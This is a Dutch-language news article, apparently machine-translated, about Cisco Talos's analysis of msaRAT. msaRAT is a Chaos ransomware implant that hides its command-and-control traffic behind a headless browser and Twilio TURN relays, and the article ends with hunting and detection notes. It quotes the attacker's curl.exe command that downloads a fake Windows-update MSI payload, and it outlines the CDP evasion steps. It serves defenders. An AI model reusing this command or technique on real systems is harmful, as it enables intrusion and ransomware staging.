De Chaos-ransomwaregroep voerde zijn commando- en controleactiviteiten uit via de eigen browser van het slachtoffer. Cisco Talos heeft donderdag msaRAT, het Rust-implantaat erachter, gedetailleerd beschreven op een gecompromitteerde Windows-machine vóór de encryptor.
Het implantaat opent nooit zelf een uitgaande verbinding. Het proces praat met 127.0.0.1 en niets anders. Het start Chrome of Edge in de headless-modus en stuurt de browser via het Chrome DevTools Protocol, de foutopsporings-API van de browser.
Elk C2-bericht gaat van daaruit verder via een WebRTC-datakanaal dat wordt doorgegeven door de TURN-service van Twilio, dus wat een verdediger op de draad ziet, is een browser die Cloudflare en Twilio aanroept. Het eigen serveradres van de aanvaller verschijnt helemaal nooit.
Chrome doet het woord
msaRAT zoekt eerst naar Chrome of Edge via omgevingsvariabelen en valt vervolgens terug op het register voor Chrome. Als er geen overeenkomende browser wordt gevonden, wordt het CDP-pad overgeslagen.
Wanneer het er een vindt, start het de browser zonder zichtbaar venster --headless=newschakelt CDP in met --remote-debugging-porten wijst deze naar een afzonderlijke --user-data-dir.
Sinds Chrome 136 respecteert Google niet langer de foutopsporingsschakelaar voor het standaardprofiel, een wijziging die in maart 2025 werd aangekondigd nadat infostealers de vlag hadden overgenomen voor cookiediefstal. msaRAT brengt zijn eigen profielmap mee, zodat de verandering hem niet in de weg staat. Niets in de analyse van Talos laat zien dat het het profiel van het slachtoffer raakt.
De malware vraagt /json/list/ voor een foutopsporingsdoel en maakt verbinding met de geretourneerde WebSocket-URL. Het creëert een tabblad, schakelt Content Security Policy uit met Page.setBypassCSPregistreert vijf terugbelverzoeken Runtime.addBindingen oproepen Runtime.evaluate om JavaScript opgeslagen in leesbare tekst in het binaire bestand te injecteren .rdata sectie.
Vier terugbelnamen, msaOpen, msaClose, msaErrorEn msaMessagegaf Talos de naam van de malware. De vijfde is dataAck.
Dat JavaScript de STUN- en TURN-configuratie ophaalt van een Cloudflare Worker op is-01-ast(.)ols-img-12(.)workers(.)devmet Origin- en Referer-headers vermomd als verkeer van de site van Microsoft. Het bouwt een peer-verbinding op en plaatst een SDP-aanbieding op hetzelfde eindpunt.
Het antwoord komt terug zonder ICE-kandidaten en het verbindingsadres is ingesteld op 0.0.0.0dus er kan geen directe peer-to-peer-link worden gevormd en het hele kanaal loopt via Twilio’s relais op global.turn.twilio.com. Zodra het datakanaal live is, verdwijnt de Werker uit het pad.
Verkeer op dat kanaal wordt tweemaal gecodeerd. De browser verwerkt DTLS en daarin zit een op ChaCha-Poly1305 gebaseerd schema dat wordt gecodeerd door een ECDH-uitwisseling die begint met een 0xFE handshake-frame van de C2 onmiddellijk na verbinding.
Het implantaat geeft binnenkomende commandoframes door cmd.exe /e:ON /v:OFF /d /c voor executie. Talos beschouwt de verzendwachtrij en de stroomcontrole als waarschijnlijk gebouwd om grote ladingen, zoals schermafbeeldingen of bestanden, betrouwbaar te verplaatsen.
Geen van beide helft van het transport is nieuw. Praetorian toonde in augustus 2025 aan dat de TURN-infrastructuur van conferentieplatforms een volledig C2-kanaal kon dragen, en Sansec vond in maart 2026 een skimmer die WebRTC-datakanalen gebruikte om gestolen kaartgegevens voorbij HTTP-inspectie te halen.
msaRAT plaatst beide in een Chaos-linked Rust-implantaat dat een headless browser via CDP aanstuurt.
De weg naar binnen is hetzelfde als altijd
msaRAT arriveert nadat de operator al uitvoering heeft gegeven en voordat de encryptor wordt uitgevoerd. Talos zegt niet hoe deze machine werd bereikt. Het gedocumenteerde draaiboek van de groep bestaat uit spamvloeden, vishing, Quick Assist en RMM-tools voor doorzettingsvermogen.
Het implantaat zelf komt naar beneden met een enkele krulopdracht:
curl.exe https://172.86.126(.)18:443/update_ms.msi -o C:programdataupdate_ms.msi
Poort 443, gewone HTTP. Firewallregels die rond poortnummers zijn geschreven, laten zonder protocolinspectie door. De MSI draagt eigenschapsgegevens over die een Windows-update nabootsen, en aan het einde van de installatie wordt een aangepaste actie geactiveerd om een ingebedde DLL rechtstreeks in het geheugen te laden.
Die DLL is msaRAT: geschreven in Rust op de asynchrone runtime van Tokio, waarbij een functie wordt geëxporteerd met de naam RUN zodat de installateur kan bellen.
Jacht notities
msaRAT is post-compromis-malware en is niet afhankelijk van een Chrome- of Edge-kwetsbaarheid, dus verdedigers hebben geen browserpatch om de techniek zelf aan te vragen.
Het signaal dat aanhoudt is procesgedrag. Zoals Talos het stelt: “Alle externe communicatie wordt gezien als afkomstig van een legitiem browserproces.” Zoek naar Chrome of Edge gelanceerd door een installatieprogramma, een service of een andere niet-interactieve ouder --headless=new En --remote-debugging-port set.
Correleer dat proces vervolgens met loopback-verkeer naar de foutopsporingspoort en uitgaande WebRTC. Waar telemetrie CDP-berichten opvangt, Runtime.addBinding En Runtime.evaluate zijn de draaipunten. Vloten die browserautomatisering of CI uitvoeren, zullen hun eigen headless-taken hebben om op af te stemmen.
Vanaf 23 juli 2026 heeft Talos geen bestandshashes voor msaRAT gepubliceerd. De openbare indicatorset bestaat uit twee netwerkartefacten, het staging-IP-adres en de hostnaam van de werker, beide in de IOC-repository. De detectiedekking van Talos:
- ClamAV:
Win.Downloader.ChaosRaas-10060321-0 - Snuiven 2:
1:66839,1:66840,1:66841 - Snuiven 3:
1:66839,1:301587
Deze indicatoren zijn nuttig, maar beperkt. workers.dev is het gedeelde implementatiedomein van Cloudflare, uitgegeven aan elk Workers-account, en aanvallers gebruikten het vorig jaar om payloads te organiseren en C2 te tunnelen.
Twilio voert een legitieme STUN- en TURN-service uit waar echte WebRTC-applicaties van afhankelijk zijn. Als u beide op organisatieniveau blokkeert, verbreekt u het werkverkeer voor iedereen die ze gebruikt. Talos leest dat dit de waarschijnlijke reden is dat Cloudflare Workers is uitgekozen voor signalering.
Beschouw dit als waargenomen vakmanschap in plaats van als een afgemeten campagne. Het rapport identificeert het slachtoffer niet, stelt niet vast hoeveel organisaties msaRAT hebben ontvangen, zegt niet wanneer de malware in gebruik is genomen, of legt uit hoe de Cloudflare Worker- en Twilio TURN-inloggegevens zijn verkregen.
De levering is onopvallend: een curl-download, een nep-Windows-update, een DLL geladen vanaf een MSI. Wat er verandert, is waar de C2 daarna woont, en beide indicatoren die Talos publiceerde, kunnen morgen worden verwisseld. Een headless browser die door een installatieprogramma wordt voortgebracht, is moeilijker te verplaatsen, omdat dit de techniek is.
msaRAT controleert op twee browsers en heeft er één nodig die aanwezig en toegestaan is. Op een Windows-park is dat geen veeleisende vereiste.